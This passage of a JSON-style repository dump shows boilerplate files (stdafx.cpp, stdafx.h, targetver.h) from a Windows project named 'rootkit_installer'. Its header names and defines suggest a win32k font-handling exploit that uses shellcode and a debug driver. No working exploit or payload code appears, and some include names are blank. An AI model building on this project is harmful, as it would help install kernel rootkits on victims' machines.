"\r\n\r\n\t\r\n\t\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\r\n\t\r\n\t\r\n\r\n" }, { "path": "src/rootkit_installer/stdafx.cpp", "content": "// stdafx.cpp : source file that includes just the standard includes\r\n// win32k_FontLinkDefaultChar.pch will be the pre-compiled header\r\n// stdafx.obj will contain the pre-compiled type information\r\n\r\n#include \"stdafx.h\"\r\n\r\n// TODO: reference any additional headers you need in STDAFX.H\r\n// and not in this file\r\n" }, { "path": "src/rootkit_installer/stdafx.h", "content": "#pragma once\r\n\r\n#include \"targetver.h\"\r\n\r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n#define USE_SHELLCODE_DBGPRINT\r\n#define USE_DEBUG_DRIVER\r\n\r\n#include \"../common/common.h\"\r\n#include \"../common/ntdll_defs.h\"\r\n#include \"../common/undocnt.h\"\r\n#include \"../common/debug.h\"\r\n#include \"../common/catchy32.h\"\r\n\r\n#include \"../common/shellcode2_struct.h\"\r\n\r\n#pragma comment(lib, \"../common/catchy32.lib\")\r\n" }, { "path": "src/rootkit_installer/targetver.h", "content": "#pragma once\r\n\r\n// The following macros define the minimum required platform. The minimum required platform\r\n// is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run \r\n// your application. The macros work by enabling all features available on platform versions up to and \r\n// including the version specified.\r\n\r\n// Modify the following defines if you have to target a platform prior to the ones specified below.\r\n// Refer to MSDN for the latest info on corresponding values for different platforms.\r\n#ifndef _WIN32_WINNT // Specifies that the minimum required platform is Windows Vista.\r\n#define _WIN32_WINNT 0x0600 // Change this to the appropriate value to target other versions of Windows.\r\n#endif\r\n\r\n" } ]